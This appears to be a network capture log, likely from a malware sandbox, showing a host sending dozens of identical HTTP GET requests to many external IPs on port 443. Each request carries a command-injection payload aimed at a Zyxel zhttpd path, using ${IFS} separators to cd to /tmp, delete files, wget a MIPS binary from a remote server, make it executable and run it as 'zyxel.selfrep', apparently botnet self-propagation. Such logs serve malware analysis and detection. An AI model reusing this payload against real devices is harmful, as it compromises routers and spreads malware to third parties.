                                                        Feb 2, 2024 06:20:59.720716000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1838192.168.2.145184284.231.192.225443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.720750093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1839192.168.2.14385768.217.17.12443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.720802069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1840192.168.2.145864888.65.2.243443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.720803022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1841192.168.2.144568470.55.92.117443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.720850945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1842192.168.2.143647045.222.244.179443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.720884085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1843192.168.2.1455352154.72.154.84443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.720931053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1844192.168.2.144862475.251.110.156443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.720979929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1845192.168.2.1458052115.164.254.16443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.721003056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1846192.168.2.1446262176.185.236.17443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.721065998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1847192.168.2.1456090140.87.197.25443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.721106052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1848192.168.2.1435714190.210.52.123443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.721136093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1849192.168.2.145841019.170.182.118443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.721183062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1850192.168.2.1459682149.27.40.117443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.721214056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1851192.168.2.1446310152.199.73.87443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.721262932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1852192.168.2.1447448185.98.192.112443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.721306086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1853192.168.2.144964454.195.171.134443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.721364021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1854192.168.2.145594234.197.98.110443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.721379042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1855192.168.2.145237234.92.72.60443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.721415997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1856192.168.2.1459134155.143.77.229443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.721472979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1857192.168.2.143553868.38.33.93443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.721518993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1858192.168.2.1450924222.98.23.176443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.721560955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1859192.168.2.144583425.228.103.251443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.721570969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1860192.168.2.1440106152.72.207.232443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.721617937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1861192.168.2.143730639.198.101.200443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.721652031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1862192.168.2.1446804148.48.90.151443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.721709013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1863192.168.2.1456886196.2.59.146443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.721745968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1864192.168.2.1457282120.241.50.77443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.721784115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1865192.168.2.1438328193.41.213.96443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.721821070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1866192.168.2.145046090.79.13.1443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.721869946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1867192.168.2.145371076.188.200.135443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.721910954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1868192.168.2.145174635.19.2.5443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.721956968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1869192.168.2.143740671.83.75.81443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.722001076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1870192.168.2.1444756210.163.19.89443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.722042084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1871192.168.2.144016820.251.56.168443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.722090960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1872192.168.2.1447732133.58.172.231443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.722131968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1873192.168.2.14594661.94.133.155443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.722148895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1874192.168.2.145717425.73.72.167443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.722214937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1875192.168.2.1459112184.152.221.98443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.722245932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1876192.168.2.1456604184.175.224.244443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.722282887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1877192.168.2.1435388196.114.78.49443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.722323895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1878192.168.2.14391789.148.91.65443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.722356081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1879192.168.2.1438324137.82.40.238443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.722404957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1880192.168.2.143736886.174.201.215443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.722438097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1881192.168.2.1453342185.62.147.244443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.722487926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1882192.168.2.1435658199.35.72.24443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.722511053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1883192.168.2.1436232200.100.134.136443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.722539902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1884192.168.2.143978084.72.164.147443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.722598076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1885192.168.2.1456206184.124.251.25443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.722635031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1886192.168.2.145711227.209.154.91443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.722691059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1887192.168.2.144810861.124.179.71443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.722729921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1888192.168.2.1434700157.237.193.96443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.722762108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1889192.168.2.1443124219.107.161.44443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.722836971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1890192.168.2.145592646.181.163.148443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.722865105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1891192.168.2.145204278.141.161.216443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.722898006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1892192.168.2.1458460102.216.146.12443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.722942114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1893192.168.2.1435262112.192.168.155443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.722965002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1894192.168.2.1458144199.30.221.126443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.723018885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1895192.168.2.1434398130.242.21.83443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.723061085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1896192.168.2.1448850120.222.49.148443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.723098993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1897192.168.2.145175272.119.250.254443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.723156929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1898192.168.2.144688493.198.74.186443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.723181009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1899192.168.2.1448700202.255.24.106443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.723229885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1900192.168.2.1441584148.48.206.167443
                                                        TimestampBytes transferredDirectionData
